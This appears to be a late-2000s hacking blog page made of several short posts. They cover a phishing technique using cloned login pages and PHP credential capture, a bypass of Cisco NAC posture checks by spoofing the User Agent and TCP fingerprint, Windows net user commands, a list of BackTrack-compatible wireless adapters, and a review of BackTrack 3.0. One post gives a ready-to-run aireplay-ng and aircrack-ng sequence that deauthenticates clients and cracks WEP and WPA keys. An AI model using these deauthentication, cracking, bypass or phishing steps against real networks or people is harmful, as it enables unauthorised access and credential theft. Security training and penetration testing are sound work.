· 0 comments

Phishing is a method of obtaining sensitive information such as usernames and passwords by pretending to be a trusted website. Tehdead shows us a variety of password phishing techniques that enable an attacker to trick a user into giving up their login information. The first step is to create a fake login page identical to the login on the trusted website. In order to not raise suspicion, Tehdead explains two methods to capture the victim’s credentials and then forward them to the real website. One method is to submit the information to a PHP page that is disguised as a pop-up advertisement, and the other is to send the username and password to a similar PHP page that is contained in an iframe. Lastly, Tehdead describes how to use link manipulation with BBCode to social engineer a victim into going to the fraudulent website. Full Scale Video Here
Download Here

Read More......

Bypass Cisco Clean Access & Cisco NAC Appliance

· 0 comments

Cisco NAC Appliance (formerly Cisco Clean Access) is a Network Admission Control (NAC) product that is used to enforce security policy on computers seeking to access network resources. With it, an administrator can force users to comply with a policy that requires the user to install or remove programs. For example, a university I previously attended required students to install McAfee Antivirus Software and remove Peer-to-Peer programs before they were allowed to access the internet.

To bypass Cisco Clean Access a user can simply change their browser’s User Agent to that of an operating system for which the program is not required [ex. Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.8) Gecko/20050511]. An easy way to change your User Agent in Firefox is to download User Agent Switcher.

With Cisco NAC Appliance, Cisco added additional detection mechanisms such as TCP fingerprinting and JavaScript OS detection, so the User Agent trick alone will not work. However, by changing the default parameters of the Windows TCP/IP stack the user can still connect to the network without running any host-based checks. You can do this with Kevin.

Video Demonstration:

Full Scale Video Here
Download Here

Read More......

Manipulating Windows User Accounts

· 0 comments

Xauthzx’s Underground video describes how to Create, Delete, and Manipulate Windows user accounts from the command line. Although it is a relatively simple procedure, knowing how to use the Windows net command can be very helpful in many situations.

User Commands
net user – Display User Accounts
net user [Username] * – Change a User’s Password
net user [Username] /del – Delete a User
net user [Username] /add – Add a User
net localgroup – Display Local Groups
net localgroup [Group] [Username] /add – Add User to Local Group

Other Useful Commands
net start – Display Services
net start [Service] – Start Service
net stop [Service] – Stop Service
net share – Manage Shared Folders
net view – Display Network Computers
net view \\[Computer Name] – Display Network Computer’s Shared Folders
net use * \\[Computer Name]\[Shared Folder] – Mount Network Shared Folder

Full Scale Video Here
Download Here

Read More......


Episode 12 - Hacking Basics - Backtrack

· 0 comments

On the forums, there have been many questions concerning Backtrack. Therefore, we decided to make a video that tries to answer as many of these questions as possible. In this episode we cover: where to get Backtrack 2, how to burn an .ISO file, how to boot Backtrack 2, how to log in, and how to start the GUI. We also illustrate basic Linux commands and how to set up your network interfaces.


Download video here (Right Click -> Save Link as)

Read More......

List of BackTrack-compatible wireless adapters

· 0 comments

PCMCIA/Cardbus/Express Card
Airlink AWLC4030 Chipset Atheros
Belkin F5D8071 Chipset Atheros
D-Link DWA-643 Chipset Atheros
D-Link DWL-650 Chipset Prism 2.5
D-Link DWL-G630 C2 v3.01 Chipset Atheros
D-Link DWL-G630 E1 Chipset Ralink
D-Link DWL-G650 C3, C4, B5 Chipset Atheros
Linksys WPC55AG v1.2 Chipset Atheros
MSI CB54G2 Chipset Ralink
Netgear WAG511 Chipset Atheros
Netgear WG511T Chipset Atheros
Netgear WG511U Chipset Atheros
Proxim 8470-WD Chipset Atheros
Senao NL-2511 CD PLUS EXT Chipset Prism 2.5
TP-Link TL-WN610G Chipset Atheros
TrendNet TEW-441PC
Ubiquiti SRC Chipset Atheros

PCI/MiniPCI/MiniPCI Express
ASUS WL-138G V2 Chipset Broadcom
ASUS WL-138gE Chipset Broadcom
Canyon CN-WF511 Chipset rt61
D-Link DWL-G550 Chipset Atheros
Linksys WMP54G v4 Chipset Ralink
Linksys WMP54G-UK v4.1 Chipset Ralink
MSI PC54G2 Chipset Ralink
Netgear WG311T Chipset Atheros
Netgear WPN311 Chipset Atheros
Thinkpad 11a/b/g Chipset Atheros
TP-Link TL-WN650G Chipset Atheros
TP-Link TL-WN651G Chipset Atheros
Trendnet TEW-443PI A1 1R Chipset Atheros

USB
Asus WL-167g v2 Chipset Ralink RT73
Airlink AWLL3026 Chipset Zydas zd1211
Alfa AWUS036E Chipset RTL8187L
Alfa AWUS036H Chipset rtl8187
Alfa AWUS036S Chipset Ralink rt73
Digitus DN-7003GS Chipset RTL8187L
D-Link DWL-G122 B1 Chipset Ralink RT2570
D-Link DWL-G122 C1 Chipset Ralink RT73
D-Link WUA-1340 Chipset Ralink RT73
Edimax EW-7318USg Hawking HWUG1 Chipset Ralink rt73
Linksys WUSB54G v4 Chipset Ralink rt2570
Linksys WUSB54GC Chipset Ralink RT73
Netgear WG111 v1 Chipset PrismGT SoftMAC
Netgear WG111 v2 Chipset RTL8187L
TP-Link TL-WN321G Chipset Ralink RT73
Trendnet TEW-429UB C1 Chipset Zydas zd1211b
ZyXEL AG-225H Chipset Zydas zd1211
ZyXEL G-202 Chipset Zydas zd1211b

Many people recommend using an Atheros chipset; BackTrack will be much more capable with it ...

Read More......

Commands for Wi-Fi Hacking (BackTrack)

· 0 comments

luthfil:
a. Disconnect all clients

aireplay-ng --deauth 10 -c FF:FF:FF:FF:FF:FF -a [AP MAC] ath0

b. WEP crack

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
new console
airodump-ng --channel [x] --bssid [x] -w [hasil] ath0
new console
aireplay-ng --arpreplay -b [AP MAC] -h [Client MAC] ath0
new console
aireplay-ng --deauth 5 -c [Client MAC] -a [AP MAC] ath0
aircrack-ng hasil*.cap
aircrack-ptw hasil-01.cap

c. WPA/WPA2 Crack

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
new console
airodump-ng --channel [x] --bssid [x] -w [hasil] ath0
new console
aireplay-ng --deauth 2 -c [client MAC] -a [Ap MAC] ath0
new console
aircrack-ng -w password.lst [hasil*cap]



Use wisely and responsibly.

Read More......

Hacking tools: A new version of BackTrack helps ethical hackers

Monday, December 1, 2008 · 0 comments

Version 3.0 of BackTrack has been released. BackTrack is a Linux-based distribution dedicated to penetration testing or hacking (depending on how you look at it). It contains more than 300 of the world's most popular open source or freely distributable hacking tools.

I wrote about the first version of BackTrack back in 2006, although it was based off of the Whax/Whoppix/Knoppix distributions, which started even earlier. Version 3.0, released on June 19, includes even more hacking tools (unfortunately, it still doesn't include Nessus due to vendor negotiations/restrictions), many bug fixes, and improved menus.

Readers often ask me how they can quickly get up to speed on hacking or defending against hackers. My answer is always the same: Subscribe to multiple computer security distribution lists, read as much as you can, and learn how to (legally) hack. BackTrack is the quickest way to get access to hundreds of tools, if the Linux part doesn't scare you. For non-Linux users, this distribution is about as Windows-friendly as you can get. Most users can get up and running using BackTrack with little or no Linux knowledge. The KDE graphical user interface makes most tools and programs usable with a few mouse clicks. For instance, setting up Snort is a one-click process (try that outside of BackTrack).

BackTrack also does a decent job for wireless and password hacking. Although there's a long list of included tools, here are my personal favorites:

  • Metasploit (vulnerability tester)
  • Snort (intrusion detection/prevention)
  • Hping (packet shaper)
  • Nmap (fe gui included)
  • Xprobe2 (OS identifier)
  • Cisco Auditing Tool
  • Curl
  • Httprint (and GUI)
  • Lynx (bare-bones browser)
  • Nikto (awesome free Web site vulnerability scanner)
  • SQL Scanner
  • Milw0rm archive
  • Dsniff
  • Ettercap
  • Hydra (password guesser)
  • John the Ripper
  • Wireshark (packet sniffer/analyzer)
  • Kismet
  • Airsnort
  • Bluesnarfer
  • SIPCrack
  • OllyDBG

Not only does BackTrack have an excellent collection of tools, the designers of the CD have tried to align BackTrack with common penetration-testing guideline frameworks, including the Open Source Security Testing Methodology Manual and Information Systems Security Assessment Framework, which can only help any budding pen tester.

You can download several different types of images, including a 784MB USB/DVD image, a stripped-down 695MB ISO, and a 689MB VMware image.

Lest I get any angry readers taking me to task for "teaching malicious hacking," these tools are for the good guys. Bad hackers are already doing just fine without the supereasy toolkits. Overall, we need more defenders learning more, and tools like BackTrack help in that regard.

Read More......
